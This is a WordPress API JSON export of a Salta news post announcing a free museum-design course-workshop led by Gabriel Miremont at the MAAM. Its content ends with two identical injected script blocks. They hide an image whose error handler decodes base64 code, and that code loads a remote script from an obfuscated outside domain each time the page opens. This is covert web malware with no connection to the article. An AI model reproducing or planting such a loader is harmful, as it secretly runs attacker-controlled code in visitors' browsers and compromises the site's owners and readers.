{"id":3256,"date":"2023-11-07T13:00:43","date_gmt":"2023-11-07T16:00:43","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=3256"},"modified":"2025-08-14T00:05:57","modified_gmt":"2025-08-14T03:05:57","slug":"curso-taller-pensar-y-hacer-museos-en-el-maam","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=3256","title":{"rendered":"Curso Taller \u201cPensar y Hacer Museos\u201d en el MAAM"},"content":{"rendered":"\n<h3 class=\"wp-block-heading has-white-color has-text-color has-background\" style=\"background-color:#d90d67\"><em>El mismo se realizar\u00e1 el lunes 13 de noviembre en Mitre 77. Est\u00e1 dirigido a personal de museos, de \u00e1reas de patrimonio cultural y p\u00fablico en general interesado.<\/em><\/h3>\n\n\n\n<p>El Museo de Arqueolog\u00eda de Alta Monta\u00f1a realizar\u00e1 el curso\/taller \u201cPensar y Hacer Museos\u201d dictado por Gabriel Miremont, a realizarse el lunes 13 de noviembre, en Mitre 77, desde las 9 hs.<\/p>\n\n\n\n<p><strong>Sobre el curso<\/strong><\/p>\n\n\n\n<p>Los siguientes puntos ser\u00e1n algunos de los abordados durante la actividad:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Museograf\u00eda curatorial<\/li>\n\n\n\n<li>El museo como sede de una exposici\u00f3n. Conocer el espacio de trabajo: relevar y modificar el espacio arquitect\u00f3nico en un espacio expogr\u00e1fico<\/li>\n\n\n\n<li>Dise\u00f1ar una exposici\u00f3n: Gui\u00f3n Museol\u00f3gico Gui\u00f3n Museogr\u00e1fico Recursos Expogr\u00e1ficos. Los objetos, los textos de sala, la difusi\u00f3n, el tiempo, el p\u00fablico<\/li>\n\n\n\n<li>La exposici\u00f3n como un sistema de comunicaci\u00f3n ver, mirar y dejar de ver.<\/li>\n<\/ul>\n\n\n\n<p>Finalmente, se confromar\u00e1 entre todos los asistentes una gu\u00eda pr\u00e1ctica para hacer una exposici\u00f3n.<\/p>\n\n\n\n<p><strong>Sobre el taller<\/strong><\/p>\n\n\n\n<p>Se conformar\u00e1 una gu\u00eda de trabajo y se aplicar\u00e1 sobre un caso real, planificando una exposici\u00f3n o un museo, de manera individual o en grupos.<\/p>\n\n\n\n<p>El curso &#8211; taller consta de dos m\u00f3dulos (ma\u00f1ana y tarde) de 3 horas cada uno, y est\u00e1 dirigido a personal de museos, de \u00e1reas de patrimonio cultural y p\u00fablico en general interesado.<\/p>\n\n\n\n<p>La inscripci\u00f3n es gratuita, con cupos limitados y se debe realizar al tel\u00e9fono 0387 4370592\/93.<\/p>\n\n\n\n<p><strong>Sobre el disertante<\/strong><\/p>\n\n\n\n<p>El Dr. Gabriel Miremont es el dise\u00f1ador, coordinador de la museolog\u00eda del MAAM y su primer director. Adem\u00e1s de ser Muse\u00f3logo y Doctor en Historia, es autor de numerosos art\u00edculos y libros sobre la tem\u00e1tica museol\u00f3gica y museogr\u00e1fica. Realizo el montaje de m\u00e1s de 40 museos y la curadur\u00eda en 200 exposiciones temporales.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/curso-taller-pensar-y-hacer-museos-en-el-maam-92701\" target=\"_blank\" rel=\"noopener\" title=\"\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>El mismo se realizar\u00e1 el lunes 13 de noviembre en Mitre 77. Est\u00e1 dirigido a personal de museos, de \u00e1reas de patrimonio cultural y p\u00fablico en general interesado. El Museo de Arqueolog\u00eda de Alta Monta\u00f1a realizar\u00e1 el curso\/taller \u201cPensar y Hacer Museos\u201d dictado por Gabriel Miremont, a realizarse el lunes 13 de noviembre, en Mitre [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":3257,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[9],"tags":[],"class_list":{"0":"post-3256","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-museos"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3256"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3256"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3256\/revisions"}],"predecessor-version":[{"id":6928,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3256\/revisions\/6928"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/3257"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3256"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3256"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3256"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}